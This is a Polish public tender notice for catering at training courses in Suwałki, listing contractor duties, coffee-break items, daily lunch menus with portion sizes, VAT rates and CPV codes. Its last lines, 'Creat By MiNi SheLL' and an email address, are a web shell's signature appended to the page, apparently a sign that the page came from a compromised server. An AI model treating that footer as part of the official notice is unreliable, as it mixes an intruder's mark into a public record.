3. W ramach zamówienia Wykonawca zobowiązany jest do:a) przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,b) rzestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c) świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d) dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia;  Użyte naczynia winny być czyste, nieuszkodzone;e) zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f)  estetycznego podawania posiłków,g) dostarczania posiłków na miejsce wskazanie przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;
h) zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4. Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 17 osób,- łączna liczba dni szkoleniowych: 15 dni,
- szacunkowa ilość zestawów: 255 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8)- miejsce świadczenia usługi:  Suwałki
5. W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata/tki zeszkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata/tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 
6. W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:
a) przerwy kawowej  23% VAT;
b) lunchu  8% VAT.7. W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;
c) Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d) Cukier biały 20g
e) Cytryna (pokrojona, podawana na talerzykach) 1plaster, f) Mleko 30 ml , g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8. W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu:
Dzień	Zestawy obiadowe:Dzień	Zestawy obiadowe:1. Karkówka po myśliwsku 120g os, Ziemniaki z koperkiem 200g os,Surówka z białej kapusty 150g os, Napój owocowy 300ml os,2.Zrazy wieprzowe 200g os, Kasza gryczana 200g os, Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os. 3.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os, Napój owocowy 300ml os. 4.Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os,Napój owocowy 300ml os.
5. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os,Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 6. Schabowy panierowany 150 g os, Ziemniaki z koperkiem 200g os, Kapusta zasmażana 200 g os, Napój owocowy 300 ml os.7. Filet rybny panierowany 150 g os, Ryż na sypko 200g os, Surówka z kapusty kiszonej 150 g os, Napój owocowy 300 ml os.8.Pieczeń wieprzowa w sosie korzennym 200 g os, Ziemniaki z koperkiem 200g os, Surówka z kapusty pekińskiej 150 g os, Napój owocowy 300 ml os.9. Karkówka po myśliwsku 120g os
Ziemniaki z koperkiem 200g os, Surówka z białej kapusty 150g os, Napój owocowy 300ml os.10.Zrazy wieprzowe 200g os.Kasza gryczana 200g os. Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os.
11.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os,Napój owocowy 300ml os. 12. Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os, Napój owocowy 300ml os. 13. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os, Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 14. Schabowy panierowany 150 g os, Ziemniaki z koperkiem 200g os, Kapusta zasmażana 200 g os, Napój owocowy 300 ml os, 15. Filet rybny panierowany 150 g os, Ryż na sypko 200g os, Surówka z kapusty kiszonej 150 g os, Napój owocowy 300 ml os.9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za catering podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> usługa żywienia podczas szkolenia Ecodriving organizowanego  
w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096/12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2013 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:
a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,
b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia;  Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazanie przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 8 osób,- łączna liczba dni szkoleniowych: 2 dni,- szacunkowa ilość zestawów: 16 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8) - miejsce świadczenia usługi:  Suwałki.5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a) przerwy kawowej  23% VAT;b) lunchu  8% VAT.
7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;c) Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d) Cukier biały 20g, e) Cytryna (pokrojona, podawana na talerzykach) 1plaster, f) Mleko 30 ml ,g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.
8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: Dzień	Zestawy obiadowe:1.Karkówka po myśliwsku 120g os, Ziemniaki z koperkiem 200g os, Surówka z białej kapusty 150g os
Napój owocowy 300ml os. 2.Roladki drobiowe z farszem mięsnym 200g os.Ziemniaki z koperkiem 200g os. Jarzynka z marchewki z groszkiem na maśle 150g os.Napój owocowy 300ml os. 9.Dania winny być podawane na gorąco. 10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za catering podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> usługa żywienia podczas szkolenia Pakiet szkoleń specjalistycznych z zakresu mechaniki i użytkowania organizowanego  w ramach projektu 
pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2013 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia;  Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazanie przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 10 osób,- łączna liczba dni szkoleniowych: 16 dni,
- szacunkowa ilość zestawów: 160 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8)
- miejsce świadczenia usługi:  Suwałki. 5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a) przerwy kawowej  23% VAT;b) lunchu  8% VAT.7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:
a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;c) Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d) Cukier biały 20g, e) Cytryna (pokrojona, podawana na talerzykach) 1plaster, f) Mleko 30 ml 
g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1. Karkówka po myśliwsku 120g os, Ziemniaki z koperkiem 200g os,Surówka z białej kapusty 150g os, Napój owocowy 300ml os,2.Zrazy wieprzowe 200g os, Kasza gryczana 200g os, Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os. 3.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os, Napój owocowy 300ml os. 4.Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os,Napój owocowy 300ml os.
5. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os,Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 6. Schabowy panierowany 150 g os, Ziemniaki z koperkiem 200g os, Kapusta zasmażana 200 g os, Napój owocowy 300 ml os.7. Filet rybny panierowany 150 g os, Ryż na sypko 200g os, Surówka z kapusty kiszonej 150 g os, Napój owocowy 300 ml os.8.Pieczeń wieprzowa w sosie korzennym 200 g os, Ziemniaki z koperkiem 200g os, Surówka z kapusty pekińskiej 150 g os, Napój owocowy 300 ml os.9. Karkówka po myśliwsku 120g os
Ziemniaki z koperkiem 200g os, Surówka z białej kapusty 150g os, Napój owocowy 300ml os.10.Zrazy wieprzowe 200g os.Kasza gryczana 200g os. Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os.
11.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os,Napój owocowy 300ml os. 12. Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os, Napój owocowy 300ml os. 13. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os, Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 14. Schabowy panierowany 150 g os, Ziemniaki z koperkiem 200g os, Kapusta zasmażana 200 g os, Napój owocowy 300 ml os, 15. Filet rybny panierowany 150 g os, Ryż na sypko 200g os, Surówka z kapusty kiszonej 150 g os, Napój owocowy 300 ml os.16.Pieczeń wieprzowa w sosie korzennym 200 g os, Ziemniaki z koperkiem 200g os, Surówka z kapusty pekińskiej 150 g os, Napój owocowy 300 ml os.9.Dania winny być podawane na gorąco. 10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za catering podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com